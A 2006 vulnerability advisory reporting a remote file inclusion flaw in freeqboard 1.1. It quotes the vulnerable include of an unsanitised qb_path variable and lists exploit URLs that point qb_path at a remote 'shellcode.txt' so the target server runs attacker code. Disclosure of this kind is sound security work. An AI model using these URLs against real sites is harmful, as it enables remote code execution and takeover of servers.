freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability

2006-12-02T00:00:00
ID SECURITYVULNS:DOC:15283
Type securityvulns
Reporter Securityvulns
Modified 2006-12-02T00:00:00

Description

                             #

freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability

   #

                             #

Author: Mr.3FReeT

                  #

                             #

Softname: freeqboard

                 #

                             #

code in :

about.php , contact.php , delete.php , faq.php , index.php

include "config.php";

include $qb_path."incs/mysql.php";

Exploit :

""""""""

www.site.com/[path]/index.php?qb_path=shellcode.txt?

www.site.com/[path]/faq.php?qb_path=shellcode.txt?

www.site.com/[path]/delete.php?qb_path=shellcode.txt?

www.site.com/[path]/contact.php?qb_path=shellcode.txt?

www.site.com/[path]/about.php?qb_path=shellcode.txt?

GreeTz: [ Dr.2 ] , [ ToOoFa ] , [ General C ] , [ asbmay ] , [ q8i^rock ]

, [ SHiKaA ] & KuW SeC TeaM


Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/